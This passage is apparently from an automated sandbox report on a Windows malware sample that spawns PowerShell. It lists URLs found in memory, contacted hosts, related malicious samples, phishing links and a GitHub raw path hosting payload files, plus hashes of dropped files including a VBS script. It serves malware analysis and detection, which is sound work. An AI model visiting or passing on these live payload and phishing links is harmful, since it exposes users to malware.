                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://go.micropowershell.exe, 0000000B.00000002.1497423977.000002498E5F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://bitbucket.orgpowershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000B.00000002.1497423977.000002498E5F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netpowershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bbuseruploads.s3.amazonaws.com/84b86a50-0f03-4f00-a68a-9b48f6a9ad1a/downloads/0d99d38f-9760-powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://raw.githubusercontent.compowershell.exe, 0000000B.00000002.1497423977.0000024987308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ion=v4.5powershell.exe, 0000000B.00000002.1497143877.0000024986D3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.cookielaw.org/powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://aui-cdn.atlassian.com/powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/pscore68powershell.exe, 00000009.00000002.1829289643.00000179CF97C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1829289643.00000179CF911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://s3-w.us-east-1.amazonaws.compowershell.exe, 0000000B.00000002.1497423977.000002498E390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1829289643.00000179CF911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://bitbucket.orgpowershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://bbuseruploads.s3.amazonaws.compowershell.exe, 0000000B.00000002.1497423977.000002498E390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  185.199.109.133
                                                                                  		raw.githubusercontent.comNetherlands
                                                                                  		54113FASTLYUSfalse
                                                                                  185.166.143.50
                                                                                  		bitbucket.orgGermany
                                                                                  		16509AMAZON-02USfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1576152
                                                                                  Start date and time:2024-12-16 15:35:12 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 5m 28s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:17
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:GdGXG0bnxH.exe
                                                                                  renamed because original name is a hash value
                                                                                  Original Sample Name:8970eef61ba5b0d180b01242796bad53.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.spre.expl.evad.winEXE@12/9@4/2
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 28
                                                                                  • Number of non-executed functions: 29
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7412 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: GdGXG0bnxH.exe

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  09:36:11API Interceptor87x Sleep call for process: powershell.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  185.199.109.133cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                  gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                  5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                  HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                  OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                  SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                  185.166.143.50fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                    pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                      ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                        3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                          pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                            https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                              lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                iVH355vnza.vbsGet hashmaliciousUnknownBrowse
                                                                                                  9QwZPBACyK.exeGet hashmaliciousUnknownBrowse
                                                                                                    PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      s3-w.us-east-1.amazonaws.comhttps://eu.onamoc.comano.us/XaFJNdmNsY0JUVzZrd09aZnpEZk9LNXJHSFV1RTlrbFdPMXQ5dzRKTHV4dEdpUEhTM1I1MCszdjdWWm54V01kSEhOSlpOSFpjMUlsaFNTc0l3eXhVeWl3TGVjWm14bGMxUFkzWWFkVUQvbUlNMGEza0pnOFFCK3N4TDBlc3RyYWJkSE9xVU9ETG5TU1lHQkZwdStVdXhGMzdoQzltdFAwRnc0WTJuMmF3Q1VkTzdMb0lwNXhqOFQ3eGRtK0ZuQUpydjMxSWdnPT0tLUFPWFdqaFhtRnVKaEhNK20tLUlJNFZwQjNETFQyTk1iL0UxMUxBTGc9PQ==?cid=300477933Get hashmaliciousKnowBe4Browse
                                                                                                      • 52.216.54.49
                                                                                                      https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                                      • 52.216.58.145
                                                                                                      18037.docGet hashmaliciousUnknownBrowse
                                                                                                      • 52.216.144.19
                                                                                                      4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 3.5.24.44
                                                                                                      fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 52.217.129.233
                                                                                                      3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 54.231.203.105
                                                                                                      ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 52.217.118.249
                                                                                                      pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 54.231.193.17
                                                                                                      hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 3.5.25.23
                                                                                                      ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 3.5.29.178
                                                                                                      raw.githubusercontent.comLaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 185.199.109.133
                                                                                                      3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                      • 185.199.109.133
                                                                                                      c56uoWlDXp.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.199.111.133
                                                                                                      gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                      • 185.199.110.133
                                                                                                      svhost.vbsGet hashmaliciousUnknownBrowse
                                                                                                      • 185.199.111.133
                                                                                                      hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                      • 185.199.111.133
                                                                                                      j87MOFviv4.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 185.199.108.133
                                                                                                      DvGZE4FU02.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 185.199.108.133
                                                                                                      j3z5kxxt52.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 185.199.108.133
                                                                                                      zpbiw0htk6.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 185.199.110.133
                                                                                                      bitbucket.org4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.166.143.49
                                                                                                      fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.166.143.50
                                                                                                      hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.49
                                                                                                      4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.49
                                                                                                      fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.49
                                                                                                      3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.166.143.48
                                                                                                      ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.166.143.48
                                                                                                      pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.166.143.50
                                                                                                      hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.166.143.49
                                                                                                      x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.48

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      AMAZON-02UShttps://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#CGet hashmaliciousUnknownBrowse
                                                                                                      • 108.158.75.84
                                                                                                      https://simatantincendi.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 44.235.253.37
                                                                                                      zmap.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 54.171.230.55
                                                                                                      zmap.arm5.elfGet hashmaliciousOkiruBrowse
                                                                                                      • 54.171.230.55
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 18.141.10.107
                                                                                                      https://eu.onamoc.comano.us/XaFJNdmNsY0JUVzZrd09aZnpEZk9LNXJHSFV1RTlrbFdPMXQ5dzRKTHV4dEdpUEhTM1I1MCszdjdWWm54V01kSEhOSlpOSFpjMUlsaFNTc0l3eXhVeWl3TGVjWm14bGMxUFkzWWFkVUQvbUlNMGEza0pnOFFCK3N4TDBlc3RyYWJkSE9xVU9ETG5TU1lHQkZwdStVdXhGMzdoQzltdFAwRnc0WTJuMmF3Q1VkTzdMb0lwNXhqOFQ3eGRtK0ZuQUpydjMxSWdnPT0tLUFPWFdqaFhtRnVKaEhNK20tLUlJNFZwQjNETFQyTk1iL0UxMUxBTGc9PQ==?cid=300477933Get hashmaliciousKnowBe4Browse
                                                                                                      • 13.227.8.37
                                                                                                      https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                                      • 52.216.58.145
                                                                                                      main_sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 54.171.230.55
                                                                                                      main_mips.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 54.171.230.55
                                                                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 54.171.141.187
                                                                                                      FASTLYUShttps://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#CGet hashmaliciousUnknownBrowse
                                                                                                      • 151.101.2.137
                                                                                                      https://simatantincendi.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 151.101.2.137
                                                                                                      https://business.livechathelpsuite.comGet hashmaliciousUnknownBrowse
                                                                                                      • 151.101.66.137
                                                                                                      fNlxQP0jBz.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 151.101.129.91
                                                                                                      LbgqLv7gT7.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 151.101.65.91
                                                                                                      fNlxQP0jBz.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 151.101.65.91
                                                                                                      LbgqLv7gT7.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 151.101.129.91
                                                                                                      https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                                                                      • 151.101.194.137
                                                                                                      https://protect.checkpoint.com/v2/r02/___https://url1251.popmenu.com/qxdhqnhp?zus=z556.WRHPCjsgt/tA51B6LI9w4BubTYwM5p/-7KrggkVEpmPU5/oVFKKM8Rk6rAnqtQtILc2Q2H_3u9DiXC41Sfynx8MyN*~*gGwOol/aO3BY*~*pgD37kbc4-7KGmCSO4DHGqcB*~*D2S053knP-7G*~*y37ScDgrX/lhFDF7r7h5Gwz-7GtvZLu*~*h33zX5RXwSF0oDJX34CSZAvVXm4AFQJ-7Gq-7KxI/mcm4qvQmbxushMLQI9uHWfHKaPI5mifSCu5iVBRcvqUxu7JB4CzzH*~*tp7hI*~*P2JxcRqKbjQDa1m4EV2vJju-7KXGYhKkA/NMg4b3nlprWADF7NLfLtJTf5xKVlxz1PBE*~*XIwKJANjSZxzJHsTEzwI07xTpBPmh9cjRp3bNxF-8I___.YzJlOm1zbm90aWZ5OmM6bzphNDQ0NjUwYTgwNjk4YzE1YzQzODY0NjgzZWZkNGFjNzo3Ojk1N2U6NjEyMTFiMTNiOTljZDFhYmUzOWRiNzM5NDE0NGE3NDNhMDJkZjlhMmI1NzgzMzhlZTAwMjhmZTBkODVlNWNmZDpoOlQ6VAGet hashmaliciousUnknownBrowse
                                                                                                      • 151.101.130.137
                                                                                                      https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                                                                      • 151.101.2.137

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#CGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133
                                                                                                      InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133
                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133
                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133
                                                                                                      #U00d6deme tavsiyesi.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133
                                                                                                      KASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133
                                                                                                      #U00d6deme tavsiyesi.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133
                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                      • 185.166.143.50
                                                                                                      • 185.199.109.133

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):9434
                                                                                                      Entropy (8bit):4.928515784730612
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                      MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:NlllulL4w/l/lZ:NllUMwl/
                                                                                                      MD5:5E4245540CA0496B6A4E15149DB9B371
                                                                                                      SHA1:6F912443CDFD9F0C474E2ACC755E982C5E3CF8BB
                                                                                                      SHA-256:6892D98C8FEF52384104FB8712A0E1DA43C1B5CA8E7E32CF33200354E2FBC522
                                                                                                      SHA-512:1E61844BED5A7A30C6DE358CC6E351FFE6F783F27B5FAC2C4E71C2F9047D84C396C91E2B3264F043D03C41AAB179C7ADD3408AD68C966C1299827363DC3AF4B0
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:@...e................................................@..........

                                                                                                      C:\Users\user\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\GdGXG0bnxH.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):15808
                                                                                                      Entropy (8bit):5.420171671036689
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:BW151SRHLqMabD7HDDZojDY05wH0UvYHtcCjc7NF9Wu0MDxpnO/9pOKg:s1GubvHXcE05wUnqNv10MFpWpOZ
                                                                                                      MD5:E2EE2212DAC9B42877E1371557B6C336
                                                                                                      SHA1:5CE46091ED91A51514F49361451E900B708D52A6
